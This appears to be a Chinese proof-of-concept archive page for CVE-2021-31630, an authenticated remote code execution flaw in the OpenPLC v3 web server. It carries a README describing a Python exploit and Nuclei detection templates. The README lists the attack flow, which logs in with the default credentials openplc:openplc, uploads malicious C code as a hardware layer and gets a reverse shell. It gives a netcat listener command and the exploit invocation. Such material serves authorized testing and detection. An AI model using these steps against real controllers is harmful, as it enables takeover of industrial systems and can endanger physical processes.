关联漏洞
标题:
OpenPLC 代码注入漏洞
(CVE-2021-31630)
描述:OpenPLC是一种开源的可编程逻辑控制器。可为自动化和研究提供低成本的工业解决方案。 OpenPLC v3 存在代码注入漏洞,该漏洞源于产品的web服务中 /hardware 页面的Hardware Layer Code Box组件未能过滤输入的特殊字符。攻击者可通过该漏洞执行系统命令。
介绍
# OpenPLC v3 Authenticated RCE (CVE-2021-31630)
This is a modern Python 3.13+ compatible proof-of-concept exploit for CVE-2021-31630, a vulnerability in OpenPLC v3 that allows an authenticated user to upload a custom hardware layer containing malicious code, leading to remote code execution (RCE) on the host.
Original vulnerability discovery and advisory by Fellipe Oliveira.
This reimplementation and modernization uses httpx, CLI tooling, logging, and safer detection techniques.
## Exploit Overview
- Vulnerability: CVE-2021-31630
- Component: OpenPLC v3 Web Server
- Impact: Authenticated Remote Code Execution
- Default Credentials: openplc:openplc
## Exploit Flow
1. Login using valid credentials
2. Upload malicious C code as a custom hardware layer
3. Trigger compilation
4. Trigger execution (optional)
5. Receive reverse shell connection
## Usage
1. Start a listener:
```
nc -lvnp 9001
```
2. Run the exploit:
```
python3 openplc_rce.py http://target:8080 -lh YOUR_IP -lp 9001
```
Optional flags:
- -u Username (default: openplc)
- -p Password (default: openplc)
- -t Timeout in seconds (default: 20)
### Features
- [x] Compatible with Python 3.13+
- [x] Built with httpx
- [x] Logging support for clean output
- [x] Modular functions for easier reuse
- [x] Nuclei detection templates included
## Nuclei Detection Templates
1. Default Credentials Check
```
nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
```
2. Passive RCE Vulnerability Check
```
nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080
```
The second template logs in and attempts a harmless payload upload + compilation to confirm likely vulnerability — without triggering actual code execution.
## Included Files
- OpenPLC_CVE_2021_31630.py – Python 3.13+ exploit
- nuclei-templates/openplc-default-login.yaml – Detect default creds
- nuclei-templates/openplc-authenticated-rce-check.yaml – Detect vulnerable behavior safely
## ⚠️ Legal / Ethics
This code is for educational and authorized security testing only.
Do not use without explicit permission from the system owner.
文件快照
[4.0K] /data/pocs/677e5361e6f961d6155bec4d406f753650cfe65b
├── [4.0K] nuclei-templates
│ ├── [1.2K] openplc-authenticated-rce-check.yaml
│ └── [ 802] openplc-default-login.yaml
├── [5.3K] OpenPLC_CVE_2021_31630.py
└── [2.1K] README.md
1 directory, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。